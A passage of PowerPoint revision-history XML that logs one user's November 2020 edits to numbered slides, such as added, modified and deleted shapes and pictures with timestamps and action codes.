          <pc:sldMk cId="1822529974" sldId="456"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:38:49.808" v="1532" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1822529974" sldId="456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5:39:00.241" v="1540" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1822529974" sldId="456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40:57.646" v="1577" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="673441270" sldId="457"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:40:57.646" v="1577" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="673441270" sldId="457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49:32.682" v="1683" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3363410009" sldId="458"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:49:32.682" v="1683" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3363410009" sldId="458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5:42:23.384" v="1625" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3363410009" sldId="458"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:50:40.991" v="1688" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1797843156" sldId="459"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:50:31.466" v="1685" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1797843156" sldId="459"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:50:40.991" v="1688" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1797843156" sldId="459"/>
            <ac:spMk id="4" creationId="{8AEE712F-5D63-3445-8006-ED4CF53BACDB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:50:40.991" v="1688" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1797843156" sldId="459"/>
            <ac:spMk id="5" creationId="{7513D1A3-2E83-3F4D-ADE4-EE4F64AA5F4E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:50:40.991" v="1688" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1797843156" sldId="459"/>
            <ac:spMk id="6" creationId="{F87E4640-CD01-7540-9FD7-0A6357684835}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp del">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:50:42.362" v="1689" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="585486488" sldId="460"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:50:35.126" v="1686" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="585486488" sldId="460"/>
            <ac:spMk id="3" creationId="{D738966C-1B16-AB42-B2B3-6ABC31009D26}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:50:35.126" v="1686" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="585486488" sldId="460"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:50:35.126" v="1686" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="585486488" sldId="460"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:50:35.126" v="1686" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="585486488" sldId="460"/>
            <ac:spMk id="6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39:56.557" v="1550" actId="313"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="91292008" sldId="462"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:39:19.211" v="1546" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="91292008" sldId="462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5:39:56.557" v="1550" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="91292008" sldId="462"/>
            <ac:spMk id="4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52:18.691" v="1725" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3650079348" sldId="463"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:52:18.691" v="1725" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3650079348" sldId="463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52:28.030" v="1738" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1650647141" sldId="471"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:52:28.030" v="1738" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1650647141" sldId="471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5:54:45.147" v="1744" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2923641776" sldId="473"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:54:45.147" v="1744" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2923641776" sldId="473"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp modAnim">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:57:00.769" v="1780" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1412850896" sldId="477"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:57:00.769" v="1780" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1412850896" sldId="477"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod addAnim delAnim">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T16:02:44.390" v="1860" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2366824256" sldId="478"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T11:34:47.734" v="451" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2366824256" sldId="478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27T15:57:41.136" v="1783" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2366824256" sldId="478"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T16:02:44.390" v="1860" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2366824256" sldId="478"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T16:00:01.313" v="1833" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2366824256" sldId="478"/>
            <ac:spMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:57:16.858" v="1782" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2366824256" sldId="478"/>
            <ac:spMk id="10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6:03:10.138" v="1866" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2887048110" sldId="479"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T16:03:10.138" v="1866" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2887048110" sldId="479"/>
            <ac:spMk id="24" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modAnim">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T16:07:17.704" v="2118" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3925033054" sldId="480"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T16:04:50.414" v="1929" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3925033054" sldId="480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6:07:17.704" v="2118" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3925033054" sldId="480"/>
            <ac:spMk id="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6:07:41.902" v="2157" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1534037611" sldId="481"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T16:07:41.902" v="2157" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1534037611" sldId="481"/>
            <ac:spMk id="2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27T16:08:33.784" v="2179" actId="108"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="153090025" sldId="482"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T16:08:19.741" v="2177" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="153090025" sldId="482"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T16:08:32.624" v="2178" actId="108"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="153090025" sldId="482"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T16:08:33.784" v="2179" actId="108"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="153090025" sldId="482"/>
            <ac:spMk id="13" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T07:02:51.037" v="255" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2555088804" sldId="501"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T07:02:51.037" v="255" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2555088804" sldId="501"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:56:26.369" v="189" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="56941902" sldId="503"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:45:32.495" v="181" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="56941902" sldId="503"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:37:55.191" v="88" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="56941902" sldId="503"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:37:56.849" v="89" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="56941902" sldId="503"/>
            <ac:spMk id="6" creationId="{0867A180-FE69-244F-B73F-CF500C8E1199}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:56:26.369" v="189" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="56941902" sldId="503"/>
            <ac:spMk id="8" creationId="{5477C132-79A3-FC40-B35A-2D5C795E81FE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:45:15.251" v="162" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="56941902" sldId="503"/>
            <ac:spMk id="10" creationId="{A0F95EE1-C691-044E-9FAA-368C1DD2B784}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:44:57.408" v="157" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="56941902" sldId="503"/>
            <ac:picMk id="7" creationId="{28ABF2C3-E32A-1340-A00E-39BFEA616C55}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:44:59.154" v="158" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="56941902" sldId="503"/>
            <ac:picMk id="9" creationId="{D00F311C-D374-FE46-9A4C-82A8194F1E6A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:47:30.479" v="183"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="56941902" sldId="503"/>
            <ac:picMk id="11" creationId="{F35E7506-3B5F-8D46-B804-A629BF1B3F2A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T13:47:51.109" v="599" actId="21"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4080626396" sldId="504"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:56:38.653" v="196" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4080626396" sldId="504"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T13:47:51.109" v="599" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4080626396" sldId="504"/>
            <ac:spMk id="4" creationId="{9BCF8204-BAD3-7A44-A0C7-A5ADCE68E940}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:57:24.600" v="200" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4080626396" sldId="504"/>
            <ac:spMk id="10" creationId="{A0F95EE1-C691-044E-9FAA-368C1DD2B784}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:57:28.994" v="203" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4080626396" sldId="504"/>
            <ac:picMk id="3" creationId="{38AFBD4F-9BCE-B243-B585-6DCE9880CC99}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:58:07.359" v="206" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4080626396" sldId="504"/>
            <ac:picMk id="5" creationId="{0971F6B1-DE81-884C-9C88-234C01BF3D2E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:57:19.812" v="197" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4080626396" sldId="504"/>
            <ac:picMk id="11" creationId="{F35E7506-3B5F-8D46-B804-A629BF1B3F2A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T07:32:40.245" v="420" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1565746182" sldId="505"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T07:20:44.630" v="367" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1565746182" sldId="505"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T07:09:12.231" v="284" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1565746182" sldId="505"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T07:09:14.865" v="285" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1565746182" sldId="505"/>
            <ac:spMk id="5" creationId="{966E01FA-C285-7D4C-8048-91C83CBE91E7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T07:31:10.612" v="403" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1565746182" sldId="505"/>
            <ac:spMk id="6" creationId="{4C6D2E8C-FA18-8946-B2EB-F8D345EBDBC8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T07:31:10.612" v="403" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1565746182" sldId="505"/>
            <ac:spMk id="7" creationId="{83DA6731-3F93-CC4D-94B1-7812CAE192F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T07:30:33.144" v="402" actId="1035"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1565746182" sldId="505"/>
            <ac:spMk id="8" creationId="{C720BD62-017A-AE47-8DDE-B86B55B827D1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T07:31:38.569" v="410"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1565746182" sldId="505"/>
            <ac:spMk id="10" creationId="{9E55C028-CB99-174B-BBDE-7EF21EEC480E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T07:32:40.245" v="420" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1565746182" sldId="505"/>
            <ac:spMk id="12" creationId="{2FFB0952-4D83-0647-AB38-9684E58F8156}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T07:32:34.667" v="418" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1565746182" sldId="505"/>
            <ac:spMk id="13" creationId="{EA55E664-94C4-9F4B-97DF-5E3BA9AA411C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T07:31:14.381" v="405" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1565746182" sldId="505"/>
            <ac:picMk id="9" creationId="{CC470898-9B38-8148-ADA6-B22F203A3092}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T07:32:31.634" v="417" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1565746182" sldId="505"/>
            <ac:picMk id="11" creationId="{68088626-16C0-7448-A769-CA990F99C849}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:51:09.553" v="1691" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2999759210" sldId="506"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:51:01.101" v="1690" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2999759210" sldId="506"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
